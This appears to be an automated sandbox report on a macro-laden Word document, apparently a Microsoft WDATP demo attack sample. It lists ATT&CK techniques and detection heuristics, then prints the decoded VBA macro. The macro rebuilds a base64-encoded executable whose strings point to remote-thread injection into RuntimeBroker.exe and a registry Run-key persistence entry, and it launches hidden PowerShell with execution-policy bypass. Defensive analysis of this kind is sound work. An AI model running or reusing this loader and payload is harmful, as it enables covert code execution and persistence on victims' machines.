MALICIOUS
450
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains a Document_Open VBA macro that utilizes WScript.Shell to execute PowerShell. The macro appears to be designed to download and run a second-stage payload, as indicated by the 'Shell() call in VBA' and 'PowerShell reference in VBA' heuristics. The reconstructed command line 'powershell.exe -W Hidden -Exec By' suggests an attempt to run a hidden PowerShell process.
Heuristics 12
-
ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set oShell = CreateObject("Wscript.Shell") Dim strArgs, strArgs1, strArgs2 -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
strArgs1 = "powershell.exe -W Hidden -Exec Bypass -Command cd /;" & _ "$file= [Convert]::FromBase64String([string]'" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set oShell = CreateObject("Wscript.Shell") Dim strArgs, strArgs1, strArgs2 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly0003AB28 41 inc ecx 0003AB29 41 inc ecx 0003AB2A 41 inc ecx 0003AB2B 41 inc ecx 0003AB2C 41 inc ecx 0003AB2D 41 inc ecx 0003AB2E 41 inc ecx 0003AB2F 41 inc ecx 0003AB30 41 inc ecx 0003AB31 41 inc ecx 0003AB32 41 inc ecx 0003AB33 41 inc ecx 0003AB34 41 inc ecx 0003AB35 41 inc ecx 0003AB36 41 inc ecx 0003AB37 41 inc ecx 0003AB38 41 inc ecx 0003AB39 41 inc ecx 0003AB3A 41 inc ecx 0003AB3B 41 inc ecx 0003AB3C 41 inc ecx 0003AB3D 41 inc ecx 0003AB3E 41 inc ecx 0003AB3F 41 inc ecx 0003AB40 41 inc ecx 0003AB41 41 inc ecx 0003AB42 41 inc ecx 0003AB43 41 inc ecx 0003AB44 41 inc ecx 0003AB45 41 inc ecx 0003AB46 41 inc ecx 0003AB47 41 inc ecx 0003AB48 41 inc ecx 0003AB49 41 inc ecx 0003AB4A 41 inc ecx 0003AB4B 41 inc ecx 0003AB4C 41 inc ecx 0003AB4D 41 inc ecx 0003AB4E 41 inc ecx 0003AB4F 41 inc ecx 0003AB50 41 inc ecx 0003AB51 41 inc ecx 0003AB52 41 inc ecx 0003AB53 41 inc ecx 0003AB54 41 inc ecx 0003AB55 41 inc ecx 0003AB56 41 inc ecx 0003AB57 41 inc ecx 0003AB58 41 inc ecx 0003AB59 41 inc ecx 0003AB5A 41 inc ecx 0003AB5B 41 inc ecx 0003AB5C 41 inc ecx 0003AB5D 41 inc ecx 0003AB5E 41 inc ecx 0003AB5F 41 inc ecx 0003AB60 41 inc ecx 0003AB61 41 inc ecx 0003AB62 41 inc ecx 0003AB63 41 inc ecx 0003AB64 41 inc ecx 0003AB65 41 inc ecx 0003AB66 41 inc ecx 0003AB67 41 inc ecx 0003AB68 41 inc ecx 0003AB69 41 inc ecx 0003AB6A 41 inc ecx 0003AB6B 41 inc ecx 0003AB6C 41 inc ecx 0003AB6D 41 inc ecx 0003AB6E 41 inc ecx 0003AB6F 41 inc ecx 0003AB70 41 inc ecx 0003AB71 41 inc ecx 0003AB72 41 inc ecx 0003AB73 41 inc ecx 0003AB74 41 inc ecx 0003AB75 41 inc ecx 0003AB76 41 inc ecx 0003AB77 41 inc ecx 0003AB78 41 inc ecx 0003AB79 41 inc ecx 0003AB7A 41 inc ecx 0003AB7B 41 inc ecx 0003AB7C 41 inc ecx 0003AB7D 41 inc ecx 0003AB7E 41 inc ecx 0003AB7F 41 inc ecx 0003AB80 41 inc ecx 0003AB81 41 inc ecx 0003AB82 41 inc ecx 0003AB83 41 inc ecx 0003AB84 41 inc ecx 0003AB85 41 inc ecx 0003AB86 41 inc ecx 0003AB87 41 inc ecx
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18529 bytes |
SHA-256: d6b524fc7d785c1ce6456f489f84459a07ff1b86eebcf528bb29ea3a907dd9b5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 17 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Dim x As Integer
x = MsgBox("You are about to run a demo attack scenario provided as part of the Microsoft WDATP Preview/Trial program. Click OK to confirm and continue, or Cancel to terminate", 1)
If x = 1 Then
Dim a As String
a = ""
a = a & "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCAOAsm1gAAAAAAAAAAPAAIgALAjAAACoAAAAGAAAAAAAAAAAAAAAgAAAAAABAAQAAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAAEAAAAAAAABAAAAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABgAADMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcEQAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAABIAAAAAAAAAAAAAAAudGV4dAAAAJAoAAAAIAAAACoAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAADMBAAAAGAAAAAGAAAALAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAAAAgAFAFglAAAYHwAAAQAAABwAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeAnsBAAAEKiICA30BAAAEKh4CewIAAAQqIgIDfQIAAAQqHgJ7AwAABCoiAgN9AwAABCoAEzAFADcAAAABAAARAnsGAAAEcgEAAHB+BAAABBIA/hUCAAACEgADKAIAAAYSAAQoBAAABhIABSgGAAAGBm8BAAArKnYCchkAAHAefgUAAARzDQAACn0GAAAEAigOAAAKKgAAABMwBABOAAAAAgAAERI"
a = a & "A/hUOAAABEgAbKA8AAAoSACEAAAAAACAAACgQAAAKEgAgAAAgACgRAAAKBoAEAAAEGI0aAAABJRZyZwAAcKIlF3J7AABwooAFAAAEKhp+BwAABCoeAoAHAAAEKgYqjigKAAAGJigKAAAGfhIAAAoDKBMAAAogADAAAB9AKBQAAAYqYigKAAAGJigKAAAGAxYgAMAAACgVAAAGKhMwBQAYAAAAAwAAESgKAAAGJigKAAAGAwQEjmkSACgWAAAGKhMwBQAaAAAABAAAEQSNHAAAAQoCbxQAAAoDBgQSASgXAAAGJgYqAAATMAcAFwAAAAMAABECbxQAAAp+EgAAChYDBBYSACgbAAAGKgATMAcAJAAAAAMAABF+EgAACiYoCgAABiYoCgAABn4SAAAKFgMEFhIAKBsAAAYmFio6AxYCbxUAAAooGAAABioAGzAFAHACAAAFAAARcxYAAAoKcxYAAAomcwgAAAYLB3LJAABwF3LPAABwbwcAAAZzFwAACgwSA/4VGwAAASgYAAAKcu0AAHAoGQAACigaAAAKbxsAAApzHAAACgreHBMHB3KAAQBwFnKGAQBwEQcoHQAACm8HAAAG3gAGfiEAAAQoHgAACjk0AQAAB3KAAQBwF3LIAQBwBigdAAAKbwcAAAYg6AIAAI0cAAABJdAiAAAEKB8AAAoTCHJLAgBwKB0AAAYMB3JvAgBwF3J1AgBwbwcAAAbeHxMJB3JvAgBwFnKnAgBwEQkoHQAACm8HAAAG3YYBAAAACBEIjmkoDQAABg0HchMDAHAXchkDAHBvBwAABt4fEwoHchMDAHAWcmMDAHARCigdAAAKbwcAAAbdSAEAAAAICREIKA8AAAYmB3LsAwBwF3LyAwBwbwcAAAbeHxMLB3LsAwBwFnI4BABwEQsoHQAACm8HAAAG3QsBAAAACAl+EgAACigSAAAGJgdyuwQAcBdywQQAcG8HAAAG3h8TDAdyuwQAcBZy9QQAcBEMKB"
a = a & "0AAApvBwAABt3LAAAAAAgJKA4AAAYm3hom3hcHcoABAHAWcmUFAHAGKB0AAApvBwAABnLqBQBwEwRyRgYAcBMFclAGAHAoIAAACm8hAAAKKCIAAAoTBn4jAAAKEQQXbyQAAAoTDRENEQURBhdvJQAACgdyfgYAcBdyhAYAcG8HAAAGEQ0RBW8mAAAK3gwRDSwHEQ1vJwAACtzeHBMOB3J+BgBwFnLEBgBwEQ4oHQAACm8HAAAG3gAHcj4HAHAXckYHAHBvBwAABnJgBwBwKCgAAAooKQAACiYqAWQAAAAAMQAhUgAcFAAAAQAArAAeygAfFAAAAQAA6gAeCAEfFAAAAQAAKAEdRQEfFAAAAQAAZQEghQEfFAAAAQAApQEKrwEDDQAAAQIA/AEoJAIMAAAAAAAA7QFFMgIcFAAAAY5yygcAcBAAAnMqAAAKKCsAAAolIP8PHwAoEwAABigLAAAGKh4CKA4AAAoqQnLuBwBwcxwAAAqAIQAABCoAAABCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADYCQAAI34AAEQKAADACQAAI1N0cmluZ3MAAAAABBQAABAIAAAjVVMAFBwAABAAAAAjR1VJRAAAACQcAAD0AgAAI0Jsb2IAAAAAAAAAAgAAAVedojUJCgAAAPoBMwAWAAABAAAAKQAAAAsAAAAwAAAAHwAAADwAAAArAAAAIwAAACIAAAABAAAABQAAAAIAAAAEAAAACAAAAAEAAAAIAAAAAQAAAAEAAAACAAAAAgAAAAEAAAAAADMEAQAAAAAABgCGA3QHBgDFA3QHBgDlA3QHBgBFAxgHEwCUBwAABgBZA1UHBgA3A1UHBgCZAxkGBgBtA8AEBgAJA6UEBgCwAmQFBgAcA3QHBgDPCGQFBgAoCKUEBgDdAaUECgB8CBgHBgC2A2QFBgBrBWQFBgDCBWQFBgBMBmQFBgBWCTUABgD9B6UEBgANBaUEBgBHB"
a = a & "6UEBgDKB6UEBgDaBGQFBgANB2QFBgALBGQFBgACCWQFBgDwBIsACgBwBhgHBgA7CHQHBgA7CWQFBgA7AmQFBgCbBWQFBgC1CTUABgDFATUABgAkAmQFBgB6AmQFBgCgBmQFCgCPBhgHAAAAAGMAAAAAAAEAAQAJARAAEgL1BC0AAQABAAEAEADXAfUENQAEAAcAgQEAABYI9QQ1AAcACgABAQAApwL1BEkACAAcAAEBAAC8AvUESQALABwAAQEAACsG9QRJABUAHAAAABAAXAX1BDUAIQAcAAABAABsAAAANQAiACAAAgEAAOQHAABJACMAIAATAQAARQAAAC0AMQAgAAEAWgFQAQEAcQFTAQEAjwFQARYAPAZWATEAqwhaAQEAvgdeAREApQFOAAYGlQBiAVaA+QhlAVaAywJlAQYGlQBiAVaA8ghpAVaAKwRpAVaA+QhpAVaAywJpAVaA4AhpAVaA+gRpAVaAVgZpAVaA5QRpAVaAowdpAQYGlQBiAVaAAwRtAVaA7gBtAVaA5QJtAVaAawltAVaASghtAVaAYgltAVaA7AJtAVaAcgltAVaAZgRtAVaAeARtAVaAjARtAREAKgBxATMBAQB1AQYGlQB5AVaAGAV8AVaA2wJ8AVaAMgF8AVaAAgZ8AVaADgF8AVaA9gJ8AVaATgJ8AVaAYQh8AVaAogB8AVaA4gV8AVaA8QV8AVaAygV8AVaAVQR8AUggAAAAAIYI+QGVAAEAUCAAAAAAhggDAhUAAQBZIAAAAACGCC4FgAECAGEgAAAAAIYIPwUQAAIAaiAAAAAAhgheBpUAAwByIAAAAACGCGcGFQADAHwgAAAAAIYADQKEAQQAvyAAAAAAhhgABwEABwDgIAAAAACRGAYHiwEHADohAAAAAJYIwgaPAQcAQSEAAAAAlgjVBpMBBwBJIQAAAACRGAYHiwEIAEshAAAAAJYAvgCYAQgAbyEAAAAAlgD0AZ8BCgCIIQAAAACW"
a = a & "AAMDpgEMAKwhAAAAAJYAGwGvAQ8A1CEAAAAAlgC0ALgBEgD4IQAAAACWABwFwAEVACgiAAAAAJYAxADIARgAAAAAAIAAkSAUCdABGgAAAAAAgACRICMJ2wEfAAAAAACAAJEgjgnkASMAAAAAAIAAkSB8CeQBKAAAAAAAgACWIHgI7wEtAAAAAACAAJEgwgj3ATAAAAAAAIAAkSAgAf0BMgAAAAAAgACRID8BBAI0ADgiAAAAAJEAlgUQAjsAGCUAAAAAkQDEABYCPAA8JQAAAACGGAAHAQA9AEQlAAAAAJEYBgeLAT0AAAABACUEAAABACUEAAABACUEAAABAB4CAAACAFAFAAADAK8GAAABACUEAAABAM0AAAACAGEEAAABAM0AAAACABQHAAABAM0AAAACABQHAAADAJ0AAAABAM0AAAACABQHAAADAGEEAAABAM0AAAACABQHAAADAOEEAAABAM0AAAACABQHAAADAOEEAAABAM0AAAACAPcHAAABAG8IAAACAJIIAAADAE4EAAAEALoCAAAFANYIAAABAG8IAAACAJIIAAADAE4EAAAEAKUCAAABAG8IAAACAIQIAAADALkGAAAEAEgEAgAFAH8FAAABAG8IAAACAIQIAgADALkGAAAEAE4EAgAFAPoAAAABAFMIAAACAGYCAAADAOQAAAABAF4CAAACACsHAAABAFIBAgACAOkBAAABAG8IAAACAK4HAAADADwEAAAEAJwIAAAFAPQGAAAGANQHAgAHANkAAAABABEIAAABAHUCCQAABwEAEQAABwUAGQAABwEAIQAABwoAMQAABxAAOQAABxUAQQAABxUASQAABxUAUQAABwEAYQAABwEAiQAABwEAeQADAx8AeQAABy4AaQAABwEAcQADBTwAcQA6B0IAcQDBB0gA2QC0Bk4A2QDmCFEAgQAwAmAAgQDSAGQAmQAABwEAgQAABwEA6QChCYUA8QCdAokA+QCABo8A+QC"
a = a & "3BZUAmQAABxUA0QC7CJkAmQBwBZ8AAQExCacAGQGlBbEAGQGCApUA0QC7CIkAIQHoBrcAqQBBCbsAqQAcBMIAqQAQBBUAMQHTAgEAOQGTAssAOQFOCdAASQEABxUAgQAOCdYACAAkAOcACAAoAOwACAAwAPEACAA0APYACAA4AOcACAA8AOwACABAAPsACABEAAABCABIAAUBCABMAAoBCABQAA8BCABYABQBCABcABkBCABgAB4BCABkACMBCABoACgBCABsAC0BCABwADIBCAB0ADcBCAB4ADwBCAB8AEEBCACAAEYBCQCQAEsBCQCUACgBCQCYAC0BCQCcADcBCQCgABQBCQCkABkBCQCoAB4BCQCsACMBCQCwADwBCQC0AEEBCQC4AEYBCQC8APEACQDAAAUBIABTACgBIQBTACgBLgALACgBLgATACgCLgAbADECLgAjAFACLgArAFkCLgAzAF8CLgA7AIkCLgBDAJYCQABTACgBQQBTACgBQwBLAOACYABTACgBYQBTACgBgABTACgBgwALACgBoABTACgBowBbACgBwABTACgBwwBbACgB4QBTACgB4wBbACgBIwFTACgBQAFTACgBQwFbACgBYAFTACgBoAELACgBwAELACgB4AELACgBAAILACgBIAILACgBQAILACgBYAILACgBAQDoAgAACwAaADcAVgBaAGgAAgABAAQABAAAABgCHAIAAEMFIAIAAKoGHAIAANkGJAICAAEAAwABAAIAAwACAAMABQABAAQABQACAAUABwABAAYABwACAAoACQABAAsACQAhBUEBKQAUCQEAQQErACMJAQBAAS0AjgkBAEABLwB8CQEAQAExAHgIAQBAATMAwggBAAABNQAgAQEAAAE3AD8BAQCoRQAAIgAEgAAAAQAAAAAAAAAAAAAAAAD1BAAABAAAAAAAAAAAAAAA3gCrAAAAAAAEAAAAAAAAAAAAAADeAGQFAAAAAAoABA"
a = a & "ALAAkAGQApAAAAAAAAOURBRkVDMjk4QkU0RjkzRjBEMUY0MkQxMzk5N0REOTUzN0NGRUIzMQBzX3NlbnNlUlMxAE1pY3Jvc29mdC5XaW4zMgBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTc0NAA8TW9kdWxlPgA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz4AU3lzdGVtLklPAHZhbHVlX18AZGF0YQBTZXRRdW90YQBtc2NvcmxpYgBDYWxsQXN5bmMAQWxsb2MAT3BlblByb2MAcHJvYwBnZXRfSWQAbHBUaHJlYWRJZABwcm9jZXNzSWQARXhlY3V0ZVJlYWQAbHBOdW1iZXJPZkJ5dGVzUmVhZABWaXJ0dWFsTWVtb3J5UmVhZABHZXRFeGl0Q29kZVRocmVhZABDcmVhdGVUaHJlYWQAQ3JlYXRlUmVtb3RlVGhyZWFkAGhUaHJlYWQAPFN0YWdlPmtfX0JhY2tpbmdGaWVsZAA8SXNTdWNjZXNzZnVsPmtfX0JhY2tpbmdGaWVsZAA8SW5mbz5rX19CYWNraW5nRmllbGQAPFByb2Nlc3NIYW5kbGVyPmtfX0JhY2tpbmdGaWVsZABSZWdpc3RyeVZhbHVlS2luZABUcmFjZQBFdmVudFNvdXJjZQBscEV4aXRDb2RlAEZyZWUAZ2V0X1N0YWdlAHNldF9TdGFnZQBUcmFjZUF0dGFja1N0YWdlAHN0YWdlAElEaXNwb3NhYmxlAGdldF9IYW5kbGUAUnVudGltZUZpZWxkSGFuZGxlAER1cGxpY2F0ZUhhbmRsZQBoSGFuZGxlAGJJbmhlcml0SGFuZGxlAGZpbGUAQ29uc29sZQBnZXRfRnJpZW5kbHlOYW1lAFdyaXRlTGluZQBDb21iaW5lAGR3RnJlZVR5cGUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUAUmVsZWFzZQBEaXNwb3NlAFRlcm1pb"
a = a & "mF0ZQBFeGVjdXRlUmVhZFdyaXRlAFZpcnR1YWxNZW1vcnlXcml0ZQBFdmVudERhdGFBdHRyaWJ1dGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEV4dGVuc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUARXhlY3V0ZQBCeXRlAERlbGV0ZVZhbHVlAFNldFZhbHVlAHZhbHVlAFJlc2VydmUAVHJvai5leGUAZHdTdGFja1NpemUAblNpemUAZHdTaXplAFN5bmNocm9uaXplAHNpemUAR3VhcmRNb2RpZmllcmZsYWcATm9DYWNoZU1vZGlmaWVyZmxhZwBXcml0ZUNvbWJpbmVNb2RpZmllcmZsYWcAU3lzdGVtLkRpYWdub3N0aWNzLlRyYWNpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBTdHJpbmcAYXJnAFdyaXRlV2F0Y2gAUGF0aABUcm9qAFBoeXNpY2FsAHNldF9MZXZlbABFdmVudExldmVsAEFsbABDYWxsAGtlcm5lbDMyLmRsbABnZXRfSXNTdWNjZXNzZnVsAHNldF9Jc1N1Y2Nlc3NmdWwAaXN1Y2Nlc3NmdWwAUHJvZ3JhbQBTeXN0ZW0ARW51bQBvcF9HcmVhdGVyVGhhbgBscE51bWJlck9mQnl0ZXNXcml0dGVuAE1haW4AQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAGdldF9Qcm9kdWN0VmVyc2lvbgBRdWVy"
a = a & "eUxpbWl0ZWRJbmZvcm1hdGlvbgBTZXRJbmZvcm1hdGlvbgBRdWVyeUluZm9ybWF0aW9uAFZpcnR1YWxNZW1vcnlPcGVyYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBUZWxlbWV0cnlPcHRpb24ARXhjZXB0aW9uAFRvcERvd24AZ2V0X0luZm8Ac2V0X0luZm8ARmlsZVZlcnNpb25JbmZvAEdldFZlcnNpb25JbmZvAFByb2Nlc3NTdGFydEluZm8AQ29uc29sZUtleUluZm8AaW5mbwBaZXJvAGxwQnVmZmVyAGdldF9Qcm9jZXNzSGFuZGxlcgBzZXRfUHJvY2Vzc0hhbmRsZXIAQ3VycmVudFVzZXIAbHBQYXJhbWV0ZXIALmN0b3IALmNjdG9yAEludFB0cgBwdHIAU3lzdGVtLkRpYWdub3N0aWNzAGR3TWlsbGlzZWNvbmRzAHNldF9LZXl3b3JkcwBFdmVudEtleXdvcmRzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAExhcmdlUGFnZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAHNldF9UYWdzAEV2ZW50VGFncwBkd0NyZWF0aW9uRmxhZ3MAUHJvY2Vzc0FjY2Vzc0ZsYWdzAGZsYWdzAEV2ZW50U291cmNlU2V0dGluZ3MAYXJncwBQcm9jZXNzRXh0ZW5zaW9ucwBFdmVudFNvdXJjZU9wdGlvbnMAUnVudGltZUhlbHBlcnMATm9BY2Nlc3MAcHJvY2Vzc0FjY2VzcwBDcmVhdGVQcm9jZXNzAGhQcm9jZXNzAE9wZW5Qcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAHRlbGVtZXRyeVRyYWl0cwB"
a = a & "Db25jYXQAV2FpdEZvclNpbmdsZU9iamVjdABmbFByb3RlY3QAUmVzZXQAb3BfRXhwbGljaXQAQ29tbWl0AERlY29tbWl0AEVudmlyb25tZW50AFN0YXJ0AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxGcmVlRXgASW5pdGlhbGl6ZUFycmF5AENyZWF0ZVN1YktleQBSZWFkS2V5AFJlZ2lzdHJ5S2V5AFJlYWRPbmx5AEV4ZWN1dGVXcml0ZUNvcHkAUmVhZFByb2Nlc3NNZW1vcnkAV3JpdGVQcm9jZXNzTWVtb3J5AGdldF9TeXN0ZW1EaXJlY3RvcnkAUmVnaXN0cnkAAAAAF0EAdAB0AGEAYwBrAFMAdABhAGcAZQAATU0AaQBjAHIAbwBzAG8AZgB0AC4AVwBpAG4AZABvAHcAcwAuAFMAZQBuAHMAZQAuAEEAdAB0AGEAYwBrAFMAYwBlAG4AYQByAGkAbwAAE0UAVABXAF8ARwBSAE8AVQBQAABNewA1AEUAQwBCADAAQgBBAEMALQBCADkAMwAwAC0ANAA3AEYANQAtAEEAOABBADQALQBFADgAMgA1ADMANQAyADkARQBEAEIANwB9AAEFMAAwAAAdQQB0AHQAYQBjAGsAIABzAHQAYQByAHQAZQBkAACAkUMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAQQBkAHYAYQBuAGMAZQBkACAAVABoAHIAZQBhAHQAIABQAHIAbwB0AGUAYwB0AGkAbwBuAFwATQBzAFMAZQBuAHMAZQAuAGUAeABlAAAFMAAxAABBRgBhAGkAbABlAGQAIAB0AG8AIABnAGUAdAAgAGMAbABpAGUAbgB0ACcAcwAgAHYAZQByAHMAaQBvAG4AOgAgAAGAgVMAdQBjAGMAZQBzAHMAZgB1AGwAbAB5ACAAZwBvAH"
a = a & "QAIABjAGwAaQBlAG4AdAAnAHMAIABzAGUAbgBzAGUAIAB2AGUAcgBzAGkAbwBuAC4AIABJAFMAIABSAFMAMgAuACAAUwBlAG4AcwBlACAAdgBlAHIAcwBpAG8AbgA6ACAAASNSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAAAUwADIAADFPAHAAZQBuAGUAZAAgAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAAa0YAYQBpAGwAZQBkACAAdABvACAAbwBwAGUAbgAgAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAgAHcAaQB0AGgAIAB0AGgAZQAgAGUAeABjAGUAcAB0AGkAbwBuADoAIAAABTAAMwAASUEAbABsAG8AYwBhAHQAZQBkACAAcwBwAGEAYwBlACAAdABvACAAUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlAACAh0YAYQBpAGwAZQBkACAAdABvACAAYQBsAGwAbwBjAGEAdABlAGQAIABzAHAAYQBjAGUAIAB0AG8AIABSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIAB3AGkAdABoACAAdABoAGUAIABlAHgAYwBlAHAAdABpAG8AbgA6ACAAAAUwADQAAEVXAHIAbwB0AGUAIAB0AG8AIABSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIABtAGUAbQBvAHIAeQAgAACAgUYAYQBpAGwAZQBkACAAdABvACAAdwByAGkAdABlACAAdABvACAAUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACAAbQBlAG0AbwByAHkAIAB3AGkAdABoACAAdABoAGUAIABlAHgAYwBlAHAAdABpAG8AbgA6ACAAAAUwADUAADNDAHIAZQBhAHQAZQBkACAAdABoA"
a = a & "GUAIAByAGUAbQBvAHQAZQAgAHQAaAByAGUAYQBkAABvRgBhAGkAbABlAGQAIAB0AG8AIABjAHIAZQBhAHQAZQAgAHQAaABlACAAcgBlAG0AbwB0AGUAIAB0AGgAcgBlAGEAZAAgAHcAaQB0AGgAIAB0AGgAZQAgAGUAeABjAGUAcAB0AGkAbwBuADoAIAAAgINTAHUAYwBjAGUAcwBzAGYAdQBsAGwAeQAgAGcAbwB0ACAAYwBsAGkAZQBuAHQAJwBzACAAcwBlAG4AcwBlACAAdgBlAHIAcwBpAG8AbgAuACAATgBPAFQAIABSAFMAMgAuACAAUwBlAG4AcwBlACAAdgBlAHIAcwBpAG8AbgA6ACAAAVtTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAACVQAcgBvAGoAAC0lAHUAcwBlAHIAcAByAG8AZgBpAGwAZQAlAFwAZABlAHMAawB0AG8AcABcAAAFMQAwAAA/QQBkAGQAZQBkACAAdABoAGUAIABiAGkAbgBhAHIAeQAgAHQAbwAgAHQAaABlACAAcgB1AG4AIABrAGUAeQAAeUYAYQBpAGwAZQBkACAAdABvACAAYQBkAGQAIAB0AGgAZQAgAGIAaQBuAGEAcgB5ACAAdABvACAAdABoAGUAIAByAHUAbgAgAGsAZQB5ACAAdwBpAHQAaAAgAHQAaABlACAAZQB4AGMAZQBwAHQAaQBvAG4AOgAgAAAHMQAwADAAABlBAHQAdABhAGMAawAgAGUAbgBkAGUAZAAAaUEAdAB0AGEAYwBrACAAcwBjAGUAbgBhAHIAaQBvACAAYwBvAG0AcABsAGUAdABlAGQAIAAKAFAAcgBlAHMAcwAgAGEAbgB5ACAAawBlAHkAIAB0AG8AIABjAGwAbwBzAGUA"
a = a & "LgAuAC4AACNyAHUAbgB0AGkAbQBlAGIAcgBvAGsAZQByAC4AZQB4AGUAAB8xADAALgAxADQAMAA3AC4AMQA0ADMAOQA0AC4AMAAAAADUm29jp7p7Rq884w/qZSxBAAMgAAEEIAEBCAUgAQERFQQgAQECBCABAQ4EBwERCAkwAQMBDhE5HgAECgERCAggAwEOEVkdDgQHARE5BSABARFdBSABARFhBSABARFlAgYYBAABGAgDBwEYBQcCHQUYAyAAGAMgAAgcBw8STRIMEkEYDg4OElEdBRJRElESURJRElUSUQMAAA4FAAIODg4FAAESfQ4DIAAOBQACDhwcBwACAhJNEk0JAAIBEoCFEYCJBQAAEoCNAwYSVQYgAhJVDgIIIAMBDhwRgJUEAAEBDgUAABGAoQcAARJBEoClCLd6XFYZNOCJBABAAAAEAIAAAAQAEAAABAAgAAAEAAAIAAQAAEAABAAAEAAEAAAgAAQAAAAgBBAAAAAEIAAAAARAAAAABIAAAAAEAQAAAAQCAAAABAQAAAAECAAAAAQAAQAABAACAAAEAAQAAAT/Dx8AAgYOAgYCAwYROQMGHQ4DBhI9AgYIAwYRFAMGERgDBhE